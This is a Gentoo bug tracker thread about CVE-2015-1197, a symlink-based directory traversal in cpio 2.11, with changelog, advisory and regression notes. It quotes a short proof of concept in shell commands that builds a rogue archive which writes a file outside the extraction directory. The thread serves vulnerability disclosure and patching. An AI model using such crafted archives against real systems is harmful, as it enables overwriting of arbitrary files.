From ${URL} : It was reported [1] that cpio is susceptible to a directory traversal vulnerability. Original report follows: ... While extracting an archive, it will extract symlinks and then follow them if they are referenced in further entries. This can be exploited by a rogue archive to write files outside the current directory. Example: 1) create a sample archive: ln -s /tmp dir echo dir | cpio -oF test.cpio rm dir mkdir dir echo hello > dir/file echo dir/file | cpio -oAF test.cpio rm -r dir 2) test it: cpio --no-absolute-filenames -ivF test.cpio This will create a symlink "dir" in the current directory and a file "/tmp/file". ... No patches are available at this time. [1]: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774669 @maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
+*cpio-2.11-r2 (09 Jan 2015) + + 09 Jan 2015; Tony Vroon <chainsaw@gentoo.org> +cpio-2.11-r2.ebuild, + +files/cpio-2.11-security.patch: + Scavenge upstream bug fixes for heap-based buffer overflow and directory + traversal through symlinks. For security bugs #530512 and #536010. Suggest stabilisation is handled in bug #530512.
This issue was resolved and addressed in GLSA 201502-11 at http://security.gentoo.org/glsa/glsa-201502-11.xml by GLSA coordinator Kristian Fiskerstrand (K_F).
CVE-2015-1197 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1197): cpio 2.11, when using the --no-absolute-filenames option, allows local users to write to arbitrary files via a symlink attack on a file in an archive.
cpio-2.11-security.patch was dropped with 2.12 bump [1]. And upstream fixed this security issue in 2.13 [2] (currently pmasked). Should this bug be reopened? [1] https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=65dd197d2dbddb0c95bbdde6097f5cce748c1fb9 [2] https://git.savannah.gnu.org/cgit/cpio.git/commit/?id=45b0ee2b407913c533f7ded8d6f8cbeec16ff6ca